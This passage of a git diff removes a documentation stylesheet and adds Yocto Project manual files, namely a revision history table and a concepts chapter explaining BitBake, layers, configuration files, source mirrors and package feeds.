-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-
-.writernotes {
-  color: red;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/overview-manual/history.rst b/documentation/overview-manual/history.rst
new file mode 100644
index 0000000000..5fde8f09dd
--- /dev/null
+++ b/documentation/overview-manual/history.rst
@@ -0,0 +1,40 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+   :widths: 10 15 40
+   :header-rows: 1
+
+   * - Revision
+     - Date
+     - Note
+   * - 2.5
+     - May 2018
+     - The initial document released with the Yocto Project 2.5 Release
+   * - 2.6
+     - November 2018
+     - Released with the Yocto Project 2.6 Release.
+   * - 2.7
+     - May 2019
+     - Released with the Yocto Project 2.7 Release.
+   * - 3.0
+     - October 2019
+     - Released with the Yocto Project 3.0 Release.
+   * - 3.1
+     - April 2020
+     - Released with the Yocto Project 3.1 Release.
+   * - 3.1.1
+     - June 2020
+     - Released with the Yocto Project 3.1.1 Release.
+   * - 3.1.2
+     - August 2020
+     - Released with the Yocto Project 3.1.2 Release.
+   * - 3.1.3
+     - September 2020
+     - Released with the Yocto Project 3.1.3 Release.
+   * - 3.1.4
+     - November 2020
+     - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/overview-manual/overview-manual-concepts.rst b/documentation/overview-manual/overview-manual-concepts.rst
new file mode 100644
index 0000000000..3401f534b1
--- /dev/null
+++ b/documentation/overview-manual/overview-manual-concepts.rst
@@ -0,0 +1,2183 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************
+Yocto Project Concepts
+**********************
+
+This chapter provides explanations for Yocto Project concepts that go
+beyond the surface of "how-to" information and reference (or look-up)
+material. Concepts such as components, the :term:`OpenEmbedded Build System`
+workflow,
+cross-development toolchains, shared state cache, and so forth are
+explained.
+
+Yocto Project Components
+========================
+
+The :term:`BitBake` task executor
+together with various types of configuration files form the
+:term:`OpenEmbedded-Core (OE-Core)`. This section
+overviews these components by describing their use and how they
+interact.
+
+BitBake handles the parsing and execution of the data files. The data
+itself is of various types:
+
+-  *Recipes:* Provides details about particular pieces of software.
+
+-  *Class Data:* Abstracts common build information (e.g. how to build a
+   Linux kernel).
+
+-  *Configuration Data:* Defines machine-specific settings, policy
+   decisions, and so forth. Configuration data acts as the glue to bind
+   everything together.
+
+BitBake knows how to combine multiple data sources together and refers
+to each data source as a layer. For information on layers, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section of the Yocto Project Development Tasks Manual.
+
+Following are some brief details on these core components. For
+additional information on how these components interact during a build,
+see the
+":ref:`overview-manual/overview-manual-concepts:openembedded build system concepts`"
+section.
+
+.. _usingpoky-components-bitbake:
+
+BitBake
+-------
+
+BitBake is the tool at the heart of the :term:`OpenEmbedded Build System`
+and is responsible
+for parsing the :term:`Metadata`, generating
+a list of tasks from it, and then executing those tasks.
+
+This section briefly introduces BitBake. If you want more information on
+BitBake, see the :doc:`BitBake User Manual <bitbake:index>`.
+
+To see a list of the options BitBake supports, use either of the
+following commands:
+::
+
+   $ bitbake -h
+   $ bitbake --help
+
+The most common usage for BitBake is ``bitbake recipename``, where
+``recipename`` is the name of the recipe you want to build (referred
+to as the "target"). The target often equates to the first part of a
+recipe's filename (e.g. "foo" for a recipe named ``foo_1.3.0-r0.bb``).
+So, to process the ``matchbox-desktop_1.2.3.bb`` recipe file, you might
+type the following:
+::
+
+   $ bitbake matchbox-desktop
+
+Several different
+versions of ``matchbox-desktop`` might exist. BitBake chooses the one
+selected by the distribution configuration. You can get more details
+about how BitBake chooses between different target versions and
+providers in the
+":ref:`Preferences <bitbake:bb-bitbake-preferences>`" section
+of the BitBake User Manual.
+
+BitBake also tries to execute any dependent tasks first. So for example,
+before building ``matchbox-desktop``, BitBake would build a cross
+compiler and ``glibc`` if they had not already been built.
+
+A useful BitBake option to consider is the ``-k`` or ``--continue``
+option. This option instructs BitBake to try and continue processing the
+job as long as possible even after encountering an error. When an error
+occurs, the target that failed and those that depend on it cannot be
+remade. However, when you use this option other dependencies can still
+be processed.
+
+.. _overview-components-recipes:
+
+Recipes
+-------
+
+Files that have the ``.bb`` suffix are "recipes" files. In general, a
+recipe contains information about a single piece of software. This
+information includes the location from which to download the unaltered
+source, any source patches to be applied to that source (if needed),
+which special configuration options to apply, how to compile the source
+files, and how to package the compiled output.
+
+The term "package" is sometimes used to refer to recipes. However, since
+the word "package" is used for the packaged output from the OpenEmbedded
+build system (i.e. ``.ipk`` or ``.deb`` files), this document avoids
+using the term "package" when referring to recipes.
+
+.. _overview-components-classes:
+
+Classes
+-------
+
+Class files (``.bbclass``) contain information that is useful to share
+between recipes files. An example is the
+:ref:`autotools <ref-classes-autotools>` class,
+which contains common settings for any application that Autotools uses.
+The ":ref:`ref-manual/ref-classes:Classes`" chapter in the
+Yocto Project Reference Manual provides details about classes and how to
+use them.
+
+.. _overview-components-configurations:
+
+Configurations
+--------------
+
+The configuration files (``.conf``) define various configuration
+variables that govern the OpenEmbedded build process. These files fall
+into several areas that define machine configuration options,
+distribution configuration options, compiler tuning options, general
+common configuration options, and user configuration options in
+``conf/local.conf``, which is found in the :term:`Build Directory`.
+
+
+.. _overview-layers:
+
+Layers
+======
+
+Layers are repositories that contain related metadata (i.e. sets of
+instructions) that tell the OpenEmbedded build system how to build a
+target. Yocto Project's `layer model <#the-yocto-project-layer-model>`__
+facilitates collaboration, sharing, customization, and reuse within the
+Yocto Project development environment. Layers logically separate
+information for your project. For example, you can use a layer to hold
+all the configurations for a particular piece of hardware. Isolating
+hardware-specific configurations allows you to share other metadata by
+using a different layer where that metadata might be common across
+several pieces of hardware.
+
+Many layers exist that work in the Yocto Project development
+environment. The `Yocto Project Curated Layer
+Index <https://www.yoctoproject.org/software-overview/layers/>`__
+and `OpenEmbedded Layer
+Index <http://layers.openembedded.org/layerindex/branch/master/layers/>`__
+both contain layers from which you can use or leverage.
+
+By convention, layers in the Yocto Project follow a specific form.
+Conforming to a known structure allows BitBake to make assumptions
+during builds on where to find types of metadata. You can find
+procedures and learn about tools (i.e. ``bitbake-layers``) for creating
+layers suitable for the Yocto Project in the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section of the Yocto Project Development Tasks Manual.
+
+.. _openembedded-build-system-build-concepts:
+
+OpenEmbedded Build System Concepts
+==================================
+
+This section takes a more detailed look inside the build process used by
+the :term:`OpenEmbedded Build System`,
+which is the build
+system specific to the Yocto Project. At the heart of the build system
+is BitBake, the task executor.
+
+The following diagram represents the high-level workflow of a build. The
+remainder of this section expands on the fundamental input, output,
+process, and metadata logical blocks that make up the workflow.
+
+.. image:: figures/YP-flow-diagram.png
+   :align: center
+
+In general, the build's workflow consists of several functional areas:
+
+-  *User Configuration:* metadata you can use to control the build
+   process.
+
+-  *Metadata Layers:* Various layers that provide software, machine, and
+   distro metadata.
+
+-  *Source Files:* Upstream releases, local projects, and SCMs.
+
+-  *Build System:* Processes under the control of
+   :term:`BitBake`. This block expands
+   on how BitBake fetches source, applies patches, completes
+   compilation, analyzes output for package generation, creates and
+   tests packages, generates images, and generates cross-development
+   tools.
+
+-  *Package Feeds:* Directories containing output packages (RPM, DEB or
+   IPK), which are subsequently used in the construction of an image or
+   Software Development Kit (SDK), produced by the build system. These
+   feeds can also be copied and shared using a web server or other means
+   to facilitate extending or updating existing images on devices at
+   runtime if runtime package management is enabled.
+
+-  *Images:* Images produced by the workflow.
+
+-  *Application Development SDK:* Cross-development tools that are
+   produced along with an image or separately with BitBake.
+
+User Configuration
+------------------
+
+User configuration helps define the build. Through user configuration,
+you can tell BitBake the target architecture for which you are building
+the image, where to store downloaded source, and other build properties.
+
+The following figure shows an expanded representation of the "User
+Configuration" box of the `general workflow
+figure <#general-workflow-figure>`__:
+
+.. image:: figures/user-configuration.png
+   :align: center
+
+BitBake needs some basic configuration files in order to complete a
+build. These files are ``*.conf`` files. The minimally necessary ones
+reside as example files in the ``build/conf`` directory of the
+:term:`Source Directory`. For simplicity,
+this section refers to the Source Directory as the "Poky Directory."
+
+When you clone the :term:`Poky` Git repository
+or you download and unpack a Yocto Project release, you can set up the
+Source Directory to be named anything you want. For this discussion, the
+cloned repository uses the default name ``poky``.
+
+.. note::
+
+   The Poky repository is primarily an aggregation of existing
+   repositories. It is not a canonical upstream source.
+
+The ``meta-poky`` layer inside Poky contains a ``conf`` directory that
+has example configuration files. These example files are used as a basis
+for creating actual configuration files when you source
+:ref:`structure-core-script`, which is the
+build environment script.
+
+Sourcing the build environment script creates a
+:term:`Build Directory` if one does not
+already exist. BitBake uses the Build Directory for all its work during
+builds. The Build Directory has a ``conf`` directory that contains
+default versions of your ``local.conf`` and ``bblayers.conf``
+configuration files. These default configuration files are created only
+if versions do not already exist in the Build Directory at the time you
+source the build environment setup script.
+
+Because the Poky repository is fundamentally an aggregation of existing
+repositories, some users might be familiar with running the
+:ref:`structure-core-script` script in the context of separate
+:term:`OpenEmbedded-Core (OE-Core)` and BitBake
+repositories rather than a single Poky repository. This discussion
+assumes the script is executed from within a cloned or unpacked version
+of Poky.
+
+Depending on where the script is sourced, different sub-scripts are
+called to set up the Build Directory (Yocto or OpenEmbedded).
+Specifically, the script ``scripts/oe-setup-builddir`` inside the poky
+directory sets up the Build Directory and seeds the directory (if
+necessary) with configuration files appropriate for the Yocto Project
+development environment.
+
+.. note::
+
+   The
+   scripts/oe-setup-builddir
+   script uses the
+   ``$TEMPLATECONF``
+   variable to determine which sample configuration files to locate.
+
+The ``local.conf`` file provides many basic variables that define a
+build environment. Here is a list of a few. To see the default
+configurations in a ``local.conf`` file created by the build environment
+script, see the
+:yocto_git:`local.conf.sample </cgit/cgit.cgi/poky/tree/meta-poky/conf/local.conf.sample>`
+in the ``meta-poky`` layer:
+
+-  *Target Machine Selection:* Controlled by the
+   :term:`MACHINE` variable.
+
+-  *Download Directory:* Controlled by the
+   :term:`DL_DIR` variable.
+
+-  *Shared State Directory:* Controlled by the
+   :term:`SSTATE_DIR` variable.
+
+-  *Build Output:* Controlled by the
+   :term:`TMPDIR` variable.
+
+-  *Distribution Policy:* Controlled by the
+   :term:`DISTRO` variable.
+
+-  *Packaging Format:* Controlled by the
+   :term:`PACKAGE_CLASSES`
+   variable.
+
+-  *SDK Target Architecture:* Controlled by the
+   :term:`SDKMACHINE` variable.
+
+-  *Extra Image Packages:* Controlled by the
+   :term:`EXTRA_IMAGE_FEATURES`
+   variable.
+
+.. note::
+
+   Configurations set in the
+   conf/local.conf
+   file can also be set in the
+   conf/site.conf
+   and
+   conf/auto.conf
+   configuration files.
+
+The ``bblayers.conf`` file tells BitBake what layers you want considered
+during the build. By default, the layers listed in this file include
+layers minimally needed by the build system. However, you must manually
+add any custom layers you have created. You can find more information on
+working with the ``bblayers.conf`` file in the
+":ref:`dev-manual/dev-manual-common-tasks:enabling your layer`"
+section in the Yocto Project Development Tasks Manual.
+
+The files ``site.conf`` and ``auto.conf`` are not created by the
+environment initialization script. If you want the ``site.conf`` file,
+you need to create that yourself. The ``auto.conf`` file is typically
+created by an autobuilder:
+
+-  *site.conf:* You can use the ``conf/site.conf`` configuration
+   file to configure multiple build directories. For example, suppose
+   you had several build environments and they shared some common
+   features. You can set these default build properties here. A good
+   example is perhaps the packaging format to use through the
+   :term:`PACKAGE_CLASSES`
+   variable.
+
+   One useful scenario for using the ``conf/site.conf`` file is to
+   extend your :term:`BBPATH` variable
+   to include the path to a ``conf/site.conf``. Then, when BitBake looks
+   for Metadata using ``BBPATH``, it finds the ``conf/site.conf`` file
+   and applies your common configurations found in the file. To override
+   configurations in a particular build directory, alter the similar
+   configurations within that build directory's ``conf/local.conf``
+   file.
+
+-  *auto.conf:* The file is usually created and written to by an
+   autobuilder. The settings put into the file are typically the same as
+   you would find in the ``conf/local.conf`` or the ``conf/site.conf``
+   files.
+
+You can edit all configuration files to further define any particular
+build environment. This process is represented by the "User
+Configuration Edits" box in the figure.
+
+When you launch your build with the ``bitbake target`` command, BitBake
+sorts out the configurations to ultimately define your build
+environment. It is important to understand that the
+:term:`OpenEmbedded Build System` reads the
+configuration files in a specific order: ``site.conf``, ``auto.conf``,
+and ``local.conf``. And, the build system applies the normal assignment
+statement rules as described in the
+":doc:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata`" chapter
+of the BitBake User Manual. Because the files are parsed in a specific
+order, variable assignments for the same variable could be affected. For
+example, if the ``auto.conf`` file and the ``local.conf`` set variable1
+to different values, because the build system parses ``local.conf``
+after ``auto.conf``, variable1 is assigned the value from the
+``local.conf`` file.
+
+Metadata, Machine Configuration, and Policy Configuration
+---------------------------------------------------------
+
+The previous section described the user configurations that define
+BitBake's global behavior. This section takes a closer look at the
+layers the build system uses to further control the build. These layers
+provide Metadata for the software, machine, and policies.
+
+In general, three types of layer input exists. You can see them below
+the "User Configuration" box in the `general workflow
+figure <#general-workflow-figure>`__:
+
+-  *Metadata (.bb + Patches):* Software layers containing
+   user-supplied recipe files, patches, and append files. A good example
+   of a software layer might be the
+   `meta-qt5 layer <https://github.com/meta-qt5/meta-qt5>`__ from
+   the `OpenEmbedded Layer
+   Index <http://layers.openembedded.org/layerindex/branch/master/layers/>`__.
+   This layer is for version 5.0 of the popular
+   `Qt <https://wiki.qt.io/About_Qt>`__ cross-platform application
+   development framework for desktop, embedded and mobile.
+
+-  *Machine BSP Configuration:* Board Support Package (BSP) layers (i.e.
+   "BSP Layer" in the following figure) providing machine-specific
+   configurations. This type of information is specific to a particular
+   target architecture. A good example of a BSP layer from the `Poky
+   Reference Distribution <#gs-reference-distribution-poky>`__ is the
+   :yocto_git:`meta-yocto-bsp </cgit/cgit.cgi/poky/tree/meta-yocto-bsp>`
+   layer.
+
+-  *Policy Configuration:* Distribution Layers (i.e. "Distro Layer" in
+   the following figure) providing top-level or general policies for the
+   images or SDKs being built for a particular distribution. For
+   example, in the Poky Reference Distribution the distro layer is the
+   :yocto_git:`meta-poky </cgit/cgit.cgi/poky/tree/meta-poky>`
+   layer. Within the distro layer is a ``conf/distro`` directory that
+   contains distro configuration files (e.g.
+   :yocto_git:`poky.conf </cgit/cgit.cgi/poky/tree/meta-poky/conf/distro/poky.conf>`
+   that contain many policy configurations for the Poky distribution.
+
+The following figure shows an expanded representation of these three
+layers from the `general workflow figure <#general-workflow-figure>`__:
+
+.. image:: figures/layer-input.png
+   :align: center
+
+In general, all layers have a similar structure. They all contain a
+licensing file (e.g. ``COPYING.MIT``) if the layer is to be distributed,
+a ``README`` file as good practice and especially if the layer is to be
+distributed, a configuration directory, and recipe directories. You can
+learn about the general structure for layers used with the Yocto Project
+in the
+":ref:`dev-manual/dev-manual-common-tasks:creating your own layer`"
+section in the
+Yocto Project Development Tasks Manual. For a general discussion on
+layers and the many layers from which you can draw, see the
+"`Layers <#overview-layers>`__" and "`The Yocto Project Layer
+Model <#the-yocto-project-layer-model>`__" sections both earlier in this
+manual.
+
+If you explored the previous links, you discovered some areas where many
+layers that work with the Yocto Project exist. The `Source
+Repositories <http://git.yoctoproject.org/>`__ also shows layers
+categorized under "Yocto Metadata Layers."
+
+.. note::
+
+   Layers exist in the Yocto Project Source Repositories that cannot be
+   found in the OpenEmbedded Layer Index. These layers are either
+   deprecated or experimental in nature.
+
+BitBake uses the ``conf/bblayers.conf`` file, which is part of the user
+configuration, to find what layers it should be using as part of the
+build.
+
+Distro Layer
+~~~~~~~~~~~~
+
+The distribution layer provides policy configurations for your
+distribution. Best practices dictate that you isolate these types of
+configurations into their own layer. Settings you provide in
+``conf/distro/distro.conf`` override similar settings that BitBake finds
+in your ``conf/local.conf`` file in the Build Directory.
+
+The following list provides some explanation and references for what you
+typically find in the distribution layer:
+
+-  *classes:* Class files (``.bbclass``) hold common functionality that
+   can be shared among recipes in the distribution. When your recipes
+   inherit a class, they take on the settings and functions for that
+   class. You can read more about class files in the
+   ":ref:`ref-manual/ref-classes:Classes`" chapter of the Yocto
+   Reference Manual.
+
+-  *conf:* This area holds configuration files for the layer
+   (``conf/layer.conf``), the distribution
+   (``conf/distro/distro.conf``), and any distribution-wide include
+   files.
+
+-  *recipes-*:* Recipes and append files that affect common
+   functionality across the distribution. This area could include
+   recipes and append files to add distribution-specific configuration,
+   initialization scripts, custom image recipes, and so forth. Examples
+   of ``recipes-*`` directories are ``recipes-core`` and
+   ``recipes-extra``. Hierarchy and contents within a ``recipes-*``
+   directory can vary. Generally, these directories contain recipe files
+   (``*.bb``), recipe append files (``*.bbappend``), directories that
+   are distro-specific for configuration files, and so forth.
+
+BSP Layer
+~~~~~~~~~
+
+The BSP Layer provides machine configurations that target specific
+hardware. Everything in this layer is specific to the machine for which
+you are building the image or the SDK. A common structure or form is
+defined for BSP layers. You can learn more about this structure in the
+:doc:`../bsp-guide/bsp-guide`.
+
+.. note::
+
+   In order for a BSP layer to be considered compliant with the Yocto
+   Project, it must meet some structural requirements.
+
+The BSP Layer's configuration directory contains configuration files for
+the machine (``conf/machine/machine.conf``) and, of course, the layer
+(``conf/layer.conf``).
+
+The remainder of the layer is dedicated to specific recipes by function:
+``recipes-bsp``, ``recipes-core``, ``recipes-graphics``,
+``recipes-kernel``, and so forth. Metadata can exist for multiple
+formfactors, graphics support systems, and so forth.
+
+.. note::
+
+   While the figure shows several
+   recipes-\*
+   directories, not all these directories appear in all BSP layers.
+
+Software Layer
+~~~~~~~~~~~~~~
+
+The software layer provides the Metadata for additional software
+packages used during the build. This layer does not include Metadata
+that is specific to the distribution or the machine, which are found in
+their respective layers.
+
+This layer contains any recipes, append files, and patches, that your
+project needs.
+
+.. _sources-dev-environment:
+
+Sources
+-------
+
+In order for the OpenEmbedded build system to create an image or any
+target, it must be able to access source files. The `general workflow
+figure <#general-workflow-figure>`__ represents source files using the
+"Upstream Project Releases", "Local Projects", and "SCMs (optional)"
+boxes. The figure represents mirrors, which also play a role in locating
+source files, with the "Source Materials" box.
+
+The method by which source files are ultimately organized is a function
+of the project. For example, for released software, projects tend to use
+tarballs or other archived files that can capture the state of a release
+guaranteeing that it is statically represented. On the other hand, for a
+project that is more dynamic or experimental in nature, a project might
+keep source files in a repository controlled by a Source Control Manager
+(SCM) such as Git. Pulling source from a repository allows you to
+control the point in the repository (the revision) from which you want
+to build software. Finally, a combination of the two might exist, which
+would give the consumer a choice when deciding where to get source
+files.
+
+BitBake uses the :term:`SRC_URI`
+variable to point to source files regardless of their location. Each
+recipe must have a ``SRC_URI`` variable that points to the source.
+
+Another area that plays a significant role in where source files come
+from is pointed to by the
+:term:`DL_DIR` variable. This area is
+a cache that can hold previously downloaded source. You can also
+instruct the OpenEmbedded build system to create tarballs from Git
+repositories, which is not the default behavior, and store them in the
+``DL_DIR`` by using the
+:term:`BB_GENERATE_MIRROR_TARBALLS`
+variable.
+
+Judicious use of a ``DL_DIR`` directory can save the build system a trip
+across the Internet when looking for files. A good method for using a
+download directory is to have ``DL_DIR`` point to an area outside of
+your Build Directory. Doing so allows you to safely delete the Build
+Directory if needed without fear of removing any downloaded source file.
+
+The remainder of this section provides a deeper look into the source
+files and the mirrors. Here is a more detailed look at the source file
+area of the `general workflow figure <#general-workflow-figure>`__:
+
+.. image:: figures/source-input.png
+   :align: center
+
+Upstream Project Releases
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Upstream project releases exist anywhere in the form of an archived file
+(e.g. tarball or zip file). These files correspond to individual
+recipes. For example, the figure uses specific releases each for
+BusyBox, Qt, and Dbus. An archive file can be for any released product
+that can be built using a recipe.
+
+Local Projects
+~~~~~~~~~~~~~~
+
+Local projects are custom bits of software the user provides. These bits
+reside somewhere local to a project - perhaps a directory into which the
+user checks in items (e.g. a local directory containing a development
+source tree used by the group).
+
+The canonical method through which to include a local project is to use
+the :ref:`externalsrc <ref-classes-externalsrc>`
+class to include that local project. You use either the ``local.conf``
+or a recipe's append file to override or set the recipe to point to the
+local directory on your disk to pull in the whole source tree.
+
+.. _scms:
+
+Source Control Managers (Optional)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Another place from which the build system can get source files is with
+:ref:`fetchers <bitbake:bb-fetchers>` employing various Source
+Control Managers (SCMs) such as Git or Subversion. In such cases, a
+repository is cloned or checked out. The
+:ref:`ref-tasks-fetch` task inside
+BitBake uses the :term:`SRC_URI`
+variable and the argument's prefix to determine the correct fetcher
+module.
+
+.. note::
+
+   For information on how to have the OpenEmbedded build system generate
+   tarballs for Git repositories and place them in the
+   DL_DIR
+   directory, see the :term:`BB_GENERATE_MIRROR_TARBALLS`
+   variable in the Yocto Project Reference Manual.
+
+When fetching a repository, BitBake uses the
+:term:`SRCREV` variable to determine
+the specific revision from which to build.
+
+Source Mirror(s)
+~~~~~~~~~~~~~~~~
+
+Two kinds of mirrors exist: pre-mirrors and regular mirrors. The
+:term:`PREMIRRORS` and
+:term:`MIRRORS` variables point to
+these, respectively. BitBake checks pre-mirrors before looking upstream
+for any source files. Pre-mirrors are appropriate when you have a shared
+directory that is not a directory defined by the
+:term:`DL_DIR` variable. A Pre-mirror
+typically points to a shared directory that is local to your
+organization.
+
+Regular mirrors can be any site across the Internet that is used as an
+alternative location for source code should the primary site not be
+functioning for some reason or another.
+
+.. _package-feeds-dev-environment:
+
+Package Feeds
+-------------
+
+When the OpenEmbedded build system generates an image or an SDK, it gets
+the packages from a package feed area located in the
+:term:`Build Directory`. The `general
+workflow figure <#general-workflow-figure>`__ shows this package feeds
+area in the upper-right corner.
+
+This section looks a little closer into the package feeds area used by
+the build system. Here is a more detailed look at the area:
+
+.. image:: figures/package-feeds.png
+   :align: center
+
+Package feeds are an intermediary step in the build process. The
+OpenEmbedded build system provides classes to generate different package
+types, and you specify which classes to enable through the
+:term:`PACKAGE_CLASSES`
+variable. Before placing the packages into package feeds, the build
+process validates them with generated output quality assurance checks
+through the :ref:`insane <ref-classes-insane>`
+class.
+
+The package feed area resides in the Build Directory. The directory the
+build system uses to temporarily store packages is determined by a
+combination of variables and the particular package manager in use. See
+the "Package Feeds" box in the illustration and note the information to
+the right of that area. In particular, the following defines where
+package files are kept:
+
+-  :term:`DEPLOY_DIR`: Defined as
+   ``tmp/deploy`` in the Build Directory.
+
+-  ``DEPLOY_DIR_*``: Depending on the package manager used, the package
+   type sub-folder. Given RPM, IPK, or DEB packaging and tarball
+   creation, the
+   :term:`DEPLOY_DIR_RPM`,
+   :term:`DEPLOY_DIR_IPK`,
+   :term:`DEPLOY_DIR_DEB`, or
+   :term:`DEPLOY_DIR_TAR`,
+   variables are used, respectively.
+
+-  :term:`PACKAGE_ARCH`: Defines
+   architecture-specific sub-folders. For example, packages could exist
+   for the i586 or qemux86 architectures.
+
+BitBake uses the
+:ref:`do_package_write_* <ref-tasks-package_write_deb>`
